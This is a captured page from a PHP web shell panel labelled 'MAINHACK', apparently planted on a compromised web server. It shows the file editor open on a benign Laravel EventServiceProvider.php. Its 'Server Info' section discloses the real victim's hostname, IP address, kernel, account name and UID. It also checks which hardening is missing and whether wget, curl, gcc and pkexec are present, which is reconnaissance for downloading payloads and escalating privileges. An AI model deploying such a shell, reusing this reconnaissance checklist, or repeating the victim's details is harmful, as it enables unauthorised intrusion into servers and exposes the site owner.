[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: EventServiceProvider.php
<?php namespace App\Providers; use App\Events\SendOrderDeliveryBoyMail; use App\Events\SendOrderDeliveryBoyPush; use App\Events\SendOrderDeliveryBoySms; use App\Events\SendOrderGotMail; use App\Events\SendOrderGotPush; use App\Events\SendOrderGotSms; use App\Events\SendOrderMail; use App\Events\SendOrderPush; use App\Events\SendOrderSms; use App\Events\SendResetPassword; use App\Events\SendSmsCode; use App\Listeners\SendOrderDeliveryBoyMailNotification; use App\Listeners\SendOrderDeliveryBoyPushNotification; use App\Listeners\SendOrderDeliveryBoySmsNotification; use App\Listeners\SendOrderGotMailNotification; use App\Listeners\SendOrderGotPushNotification; use App\Listeners\SendOrderGotSmsNotification; use App\Listeners\SendOrderMailNotification; use App\Listeners\SendOrderPushNotification; use App\Listeners\SendOrderSmsNotification; use App\Listeners\SendResetPasswordNotification; use App\Listeners\SendSmsCodeNotification; use App\Models\User; use App\Observers\UserObserver; use Illuminate\Auth\Events\Registered; use Illuminate\Auth\Listeners\SendEmailVerificationNotification; use Illuminate\Foundation\Support\Providers\EventServiceProvider as ServiceProvider; class EventServiceProvider extends ServiceProvider { /** * The event to listener mappings for the application. * * @var array<class-string, array<int, class-string>> */ protected $listen = [ Registered::class => [ SendEmailVerificationNotification::class ], SendResetPassword::class => [ SendResetPasswordNotification::class ], SendSmsCode::class => [ SendSmsCodeNotification::class ], SendOrderMail::class => [ SendOrderMailNotification::class ], SendOrderSms::class => [ SendOrderSmsNotification::class ], SendOrderPush::class => [ SendOrderPushNotification::class ], SendOrderDeliveryBoyMail::class => [ SendOrderDeliveryBoyMailNotification::class ], SendOrderDeliveryBoySms::class => [ SendOrderDeliveryBoySmsNotification::class ], SendOrderDeliveryBoyPush::class => [ SendOrderDeliveryBoyPushNotification::class ], SendOrderGotMail::class => [ SendOrderGotMailNotification::class ], SendOrderGotSms::class => [ SendOrderGotSmsNotification::class ], SendOrderGotPush::class => [ SendOrderGotPushNotification::class ] ]; /** * Register any events for your application. * * @return void */ public function boot() { User::observe(UserObserver::class); } /** * Determine if events and listeners should be automatically discovered. * * @return bool */ public function shouldDiscoverEvents() { return false; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 60.06 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002